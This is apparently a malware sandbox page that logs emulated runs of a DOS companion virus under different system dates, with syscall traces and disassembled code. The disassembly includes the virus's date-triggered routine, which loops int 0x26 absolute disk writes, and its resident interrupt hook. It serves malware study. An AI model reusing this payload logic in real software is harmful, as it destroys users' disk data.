Sample viewer

vx.netlux.org/Virus.DOS.Companion.Carvir.296

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:28:44.00381991Z	42	PC: 12aea \| Get date 0x12aea: cmp dh, 0xa 0x12aed: jne 0x12b06 0x12aef: cmp dl, 0x11 0x12af2: jne 0x12b06 0x12af4: mov al, 2 0x12af6: mov cx, 1 0x12af9: mov bx, 0x115 0x12afc: cdq 0x12afd: int 0x26 0x12aff: inc dx 0x12b00: jae 0x12afd 0x12b02: inc al 0x12b04: jmp 0x12af6 0x12b06: mov ax, 0xfa01 0x12b09: mov dx, 0x5945 0x12b0c: int 0x21 0x12b0e: mov ax, 0x3521 0x12b11: int 0x21 0x12b13: mov di, 0x228 0x12b16: mov word ptr [0x228], bx
2018-12-17T22:28:44.007078952Z	250	PC: 12b0e \| UNKNOWN!
2018-12-17T22:28:44.018651175Z	53	PC: 12b13 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:28:44.020159392Z	37	PC: 12b26 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:28:44.021593498Z	49	PC: 12b2a \| Terminate and stay resident (Return code = '0' \| Memory size = '35')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5127,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:53:43.365625073Z	42	PC: 12aea \| Get date 0x12aea: cmp dh, 0xa 0x12aed: jne 0x12b06 0x12aef: cmp dl, 0x11 0x12af2: jne 0x12b06 0x12af4: mov al, 2 0x12af6: mov cx, 1 0x12af9: mov bx, 0x115 0x12afc: cdq 0x12afd: int 0x26 0x12aff: inc dx 0x12b00: jae 0x12afd 0x12b02: inc al 0x12b04: jmp 0x12af6 0x12b06: mov ax, 0xfa01 0x12b09: mov dx, 0x5945 0x12b0c: int 0x21 0x12b0e: mov ax, 0x3521 0x12b11: int 0x21 0x12b13: mov di, 0x228 0x12b16: mov word ptr [0x228], bx
2018-12-25T11:53:43.367654717Z	250	PC: 12b0e \| UNKNOWN!
2018-12-25T11:53:43.369092862Z	53	PC: 12b13 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:53:43.370092281Z	37	PC: 12b26 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:53:43.371058055Z	49	PC: 12b2a \| Terminate and stay resident (Return code = '0' \| Memory size = '35')

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5127,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:53:43.448642396Z	42	PC: 12aea \| Get date 0x12aea: cmp dh, 0xa 0x12aed: jne 0x12b06 0x12aef: cmp dl, 0x11 0x12af2: jne 0x12b06 0x12af4: mov al, 2 0x12af6: mov cx, 1 0x12af9: mov bx, 0x115 0x12afc: cdq 0x12afd: int 0x26 0x12aff: inc dx 0x12b00: jae 0x12afd 0x12b02: inc al 0x12b04: jmp 0x12af6 0x12b06: mov ax, 0xfa01 0x12b09: mov dx, 0x5945 0x12b0c: int 0x21 0x12b0e: mov ax, 0x3521 0x12b11: int 0x21 0x12b13: mov di, 0x228 0x12b16: mov word ptr [0x228], bx
2018-12-25T11:53:43.45117506Z	250	PC: 12b0e \| UNKNOWN!
2018-12-25T11:53:43.451946674Z	53	PC: 12b13 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:53:43.452963013Z	37	PC: 12b26 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:53:43.454312598Z	49	PC: 12b2a \| Terminate and stay resident (Return code = '0' \| Memory size = '35')

{"DateBased":true,"Day":17,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5127,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:53:44.080143033Z	42	PC: 12aea \| Get date 0x12aea: cmp dh, 0xa 0x12aed: jne 0x12b06 0x12aef: cmp dl, 0x11 0x12af2: jne 0x12b06 0x12af4: mov al, 2 0x12af6: mov cx, 1 0x12af9: mov bx, 0x115 0x12afc: cdq 0x12afd: int 0x26 0x12aff: inc dx 0x12b00: jae 0x12afd 0x12b02: inc al 0x12b04: jmp 0x12af6 0x12b06: mov ax, 0xfa01 0x12b09: mov dx, 0x5945 0x12b0c: int 0x21 0x12b0e: mov ax, 0x3521 0x12b11: int 0x21 0x12b13: mov di, 0x228 0x12b16: mov word ptr [0x228], bx